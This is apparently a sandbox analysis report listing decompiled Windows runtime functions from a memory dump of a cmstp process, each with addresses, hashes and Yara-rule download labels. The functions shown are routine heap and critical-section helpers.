Function 050DF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E050DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0510F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L050F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x050df35d
0x050df361
0x050df367
0x050df372
0x050df38c
0x050df38c
0x050df394

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 306f1cd109d3230a60f9e1f2297db0059592b6055e57a0bd0fe42a3f84978634
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: DAE0D832A40218BBCB31A7D9AD05F9FBBACDB44AA0F054155BD05D7190D5619E00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 05103F33 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05103F33(void* __ecx, signed char _a4) {
				signed int _t12;

				if(( *(__ecx + 0x40) & 0x75010f63) != 2 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					return 0;
				} else {
					if((_a4 & 0x00000001) != 0) {
						_t12 = 1;
					} else {
						_t12 =  *0x51c6240; // 0x4
					}
					return 0x7d0 + _t12 * 0x3480;
				}
			}

0x05103f43
0x00000000
0x05103f54
0x05103f58
0x05103f70
0x05103f5a
0x05103f5a
0x05103f5a
0x00000000
0x05103f65

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6a16aef8d2ed45459090eec5668526fb333f3630a9e3c5c9ddeb91c2013086
Instruction ID: b75ad223192152f29862f31fd35bba5ee3f7bf14e835d8aff4ebda8ecf6cd9cd
Opcode Fuzzy Hash: 7d6a16aef8d2ed45459090eec5668526fb333f3630a9e3c5c9ddeb91c2013086
Instruction Fuzzy Hash: 25E02633524244ABD722D628C582B327BF9F750748F206C25F426CF4C1D7EDE581D58A

Uniqueness

Uniqueness Score: -1.00%

Function 050EFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x50b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E051A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E050F0050(_t14);
				}
			}

0x050eff66
0x050eff6b
0x00000000
0x050eff8f
0x00000000
0x050eff8f

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d83f56d394bef0afe1cedf06da3424a7c0fb43e1035907202496ad3d805ae76
Instruction ID: 763c19075d7521da5905cfe958b66ca6b0d5a605fe905d678388541061c526b6
Opcode Fuzzy Hash: 8d83f56d394bef0afe1cedf06da3424a7c0fb43e1035907202496ad3d805ae76
Instruction Fuzzy Hash: BAE0DFB12092859FDB34DB91F195F3D37E9AF86621F29841DE0094B502D6A1D880C60A

Uniqueness

Uniqueness Score: -1.00%

Function 051641E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E051641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x51b08f0);
				_t5 = E0512D08C(__ebx, __edi, __esi);
				if( *0x51c87ec == 0) {
					E050EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x51c87ec == 0) {
						 *0x51c87f0 = 0x51c87ec;
						 *0x51c87ec = 0x51c87ec;
						 *0x51c87e8 = 0x51c87e4;
						 *0x51c87e4 = 0x51c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05164248();
				}
				return E0512D0D1(_t5);
			}

0x051641e8
0x051641ea
0x051641ef
0x051641fb
0x05164206
0x0516420b
0x05164216
0x0516421d
0x05164222
0x0516422c
0x05164231
0x05164231
0x05164236
0x0516423d
0x0516423d
0x05164247

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3dce4f2a31fa480a5adff21ebe3e88f8fe7abfdf5277175716e7a80839ecb7
Instruction ID: ff757558666842cbd8d809470b1f316e63337c63255739b24da85f23bc258c72
Opcode Fuzzy Hash: 3c3dce4f2a31fa480a5adff21ebe3e88f8fe7abfdf5277175716e7a80839ecb7
Instruction Fuzzy Hash: 23F01574A21700EEEBA0FFA8E5CA7583EB4F744310F61415AA100A72D4EBB64591CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0518D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0518D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L050DE8B0(__ecx, _a4, 0xfff);
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0518d38a
0x0518d39b
0x0518d3b1
0x00000000
0x0518d3b6
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 2e19f877c8dc6d61a4a82e5f9e7a4a7f15972465cc55ae856cf0d59b517a2cf3
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 61E08C31280344BBDB326A44EC00FB9BA1AEB507A0F104031FE085AA90C671AC91DAD4

Uniqueness

Uniqueness Score: -1.00%

Function 0510A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0510A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x51c67e4 >= 0xa) {
					if(_t5 < 0x51c6800 || _t5 >= 0x51c6900) {
						return L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E050F0010(0x51c67e0, _t5);
				}
			}

0x0510a190
0x0510a1a6
0x0510a1c2
0x00000000
0x00000000
0x00000000
0x0510a192
0x0510a192
0x0510a19f
0x0510a19f

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca189cb8c6a7a74298720bb77ac648fed16a44ecd868681acd6c84573a72bdf5
Instruction ID: 6dc25ad19633e6456bdf457dbc6a6526f03be066a25b0df5d479df784423cc60
Opcode Fuzzy Hash: ca189cb8c6a7a74298720bb77ac648fed16a44ecd868681acd6c84573a72bdf5
Instruction Fuzzy Hash: 9BD0C2312302002AC61CA3089EBCB652A22EBA8700FA0084CE2030A9D0DBB588D0C208

Uniqueness

Uniqueness Score: -1.00%

Function 051016E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E05101710(0x51c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L050F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x051016e8
0x051016ef
0x051016f3
0x051016fe
0x00000000
0x05101700
0x0510170d
0x0510170d
0x051016f2
0x051016f2
0x051016f2
0x051016f2

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce163749516f21a1ff3927e94b2f98b8fe4da874f9def84aeea762b34d9fda56
Instruction ID: f1d1518b86d65c04791fda27be4f7b5cc66f971e011a382f10efb9e768d386dd
Opcode Fuzzy Hash: ce163749516f21a1ff3927e94b2f98b8fe4da874f9def84aeea762b34d9fda56
Instruction Fuzzy Hash: 44D0A731280200B6DE2D6B14DC48B152252FB90781F78105CF207598C1CFE9CD92E048

Uniqueness

Uniqueness Score: -1.00%

Function 051553CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E050EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x051553ca
0x051553ce
0x051553d9
0x051553de
0x051553e1
0x051553e1
0x051553e6
0x051553f3
0x00000000
0x051553f8
0x051553fb

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: c4df55850df43b0e6523b73854ff0a7f2f06a6f3e7682fbf02d14f432f2bbb7f
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 85E08C31A04784DFCF12DB48D654F8EB7FAFB84B00F150004A5195B620C734AC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 051035A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E050EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x051035a1
0x051035a1
0x051035a5
0x051035ab
0x051035ab
0x051035b5
0x00000000
0x051035c1
0x051035b7

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: bbc532b341aea57c0dc2a1a2aebc26054dd9b3b21456aaba8a21c51279caf021
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: BDD0A931A055849EDB19EB10C228BAC33B6BB0020AF6838668012068F2C3BA4A0ECE00

Uniqueness

Uniqueness Score: -1.00%

Function 050EAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x050eaab6
0x050eaabb
0x0513a442
0x00000000
0x0513a448
0x0513a454
0x0513a454
0x050eaac1
0x050eaac1
0x050eaac6
0x050eaac6

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: ba9cfa3809c5c077de785b3161f201f2432860c21007020aa05ee4b0cffea17c
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 61D0E935352A80CFD756CB1DC569B1573A5BB44B44FD90490E541CB761E72CDD54CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0515A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0515A537(intOrPtr _a4, intOrPtr _a8) {

				return L050F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0515a553

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: ce21dd9f582f0627b7fb4272b49ef1fb24d5b41db07082bbbf27347d6082f8df
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 7EC08C33180648BBCF126F81DC04F8A7F2AFBA4B60F008010FA080B970C632E970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 050DDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L050F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x050ddb4d
0x050ddb54
0x050ddb5f
0x050ddb56
0x050ddb56
0x050ddb5c
0x050ddb5c

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 2b42cf81b0dc3938d37c26079afa622091c3fd998b1a23f9fcdbb22318ec18e4
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: E6C08C32380B40AAEF221F20ED01B4576A0BB10B05F4400A06701DA4F0DBB8D901E610

Uniqueness

Uniqueness Score: -1.00%

Function 050DAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050DAD30(intOrPtr _a4) {

				return L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x050dad49

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: a5e4088753bdb51cde863c0e4c45fbe833ec4332c890a84e5187df0696854559
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: CFC08C32180248BBC7126A45DE00F457B29E7A0B60F000020F6040AA618932E860D688

Uniqueness

Uniqueness Score: -1.00%

Function 051036CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x051036d2
0x051036e8
0x051036d4
0x051036e5
0x051036e5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: a3c9ea1538ef18cc9a9001cad06cd0b3c2687c592e0eee4d9ed8bc79ac235304
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: E1C02B70350440BBDF151F30CD00F197254F710B21F6407547330458F0D6A8DD00D200

Uniqueness

Uniqueness Score: -1.00%

Function 050E76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x050e76e4
0x00000000
0x050e76f8
0x050e76fd

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: d6d89fd9d3328bf88cbf4da87fea1e140a3fea8fb6ba20297ad93cc44897325d
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: FCC08C703512C05EEB2E5B08EE24F383690FB0960CF68019CEA02098A1C368B802C208

Uniqueness

Uniqueness Score: -1.00%

Function 050F3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050F3A1C(intOrPtr _a4) {
				void* _t5;

				return L050F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x050f3a35

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 3f8850753b6d439cc8fe84c8253d1c0523542a7911df80e7dd275aec92ab5ece
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 29C08C32180248BBCB126E41EC00F067B29E7A0B60F000020BB040A9608572ED60D688

Uniqueness

Uniqueness Score: -1.00%

Function 05104190 Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05104190() {

				if(E050F7D50() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x14));
				} else {
					return  *0x7ffe02d0;
				}
			}

0x05104197
0x0514641c
0x0510419d
0x051041a2
0x051041a2

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction ID: a52e7f9860dd04c6017ba2d069b374dbb9aa1c3988690e029d5bdcc332c99372
Opcode Fuzzy Hash: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction Fuzzy Hash: CAC002357119408FCF15CB29D288E5937E4B744744F190890E9058BA21D624E800CA11

Uniqueness

Uniqueness Score: -1.00%

Function 050F7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x050f7d56
0x050f7d5b
0x050f7d60
0x050f7d5d
0x050f7d5d
0x050f7d5d

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 1d59f40362a609f221e7c839c2af7d5d129dbb13728e4d7836debc7ffa4d4230
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: DAB092343019408FCE56DF18C180F2933F4FB44A40B8800D0E400CBA20D229E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 05102ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05102ACB() {
				void* _t5;

				return E050EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x05102adc

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: adcfd5e5c7306e4b04eadb84670d7932bf21c9237c1b12dba1ce3d65a436e8aa
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 95B01232D10444CFCF02EF40D610B5E7335FB40750F154491900127930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0516FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0516FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0511CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05165720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05165720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0516fdda
0x0516fde2
0x0516fde5
0x0516fdec
0x0516fdfa
0x0516fdff
0x0516fe0a
0x0516fe0f
0x0516fe17
0x0516fe1e
0x0516fe19
0x0516fe19
0x0516fe19
0x0516fe20
0x0516fe21
0x0516fe22
0x0516fe25
0x0516fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0516FDFA

Strings

